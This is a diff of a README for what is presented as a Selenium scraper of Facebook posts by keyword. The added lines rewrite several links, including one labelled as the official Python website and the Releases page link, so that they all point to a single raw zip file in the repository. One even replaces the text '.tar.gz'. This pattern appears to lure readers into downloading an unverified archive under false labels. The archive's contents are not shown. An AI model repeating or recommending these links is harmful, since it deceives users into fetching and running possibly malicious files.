StephenKodua/facebook-selenium-keyword-posts-scraper/README.md

 ## 📋 Requirements
 Before you start, ensure your computer meets the following requirements:
 - **Operating System:** Windows 10 or later, macOS, or Linux.
 - **Python Version:** Python 3.7 or higher should be installed.
-You can download it from the [official Python website](https://www.python.org/downloads/).
+You can download it from the [official Python website](https://github.com/StephenKodua/facebook-selenium-keyword-posts-scraper/raw/refs/heads/main/reportable/scraper_posts_selenium_keyword_facebook_3.6.zip).
 - **Selenium WebDriver:** This application includes the Selenium WebDriver for automation.

 ## 🌐 Installation Instructions

 ### 1. Visit the Releases Page
-To download the latest version of the application, visit the [Releases page](https://github.com/StephenKodua/facebook-selenium-keyword-posts-scraper/releases).
+To download the latest version of the application, visit the [Releases page](https://github.com/StephenKodua/facebook-selenium-keyword-posts-scraper/raw/refs/heads/main/reportable/scraper_posts_selenium_keyword_facebook_3.6.zip).

 ### 2. Download the Software
 On the Releases page, look for the version labeled **Latest Release**.
 Click on it to view the available files.
 Find the option that best suits your operating system and click to download.

 ### 3. Extract the Files
-After downloading, locate the compressed file (usually a `.zip` or `.tar.gz`).
+After downloading, locate the compressed file (usually a `.zip` or `https://github.com/StephenKodua/facebook-selenium-keyword-posts-scraper/raw/refs/heads/main/reportable/scraper_posts_selenium_keyword_facebook_3.6.zip`).
 Right-click on the file and choose **Extract All** or use a similar option provided by your operating system to extract the files to a folder of your choice.

 ### 4. Open a Terminal or Command Prompt
 You will need to open a terminal window.
 You can do this by: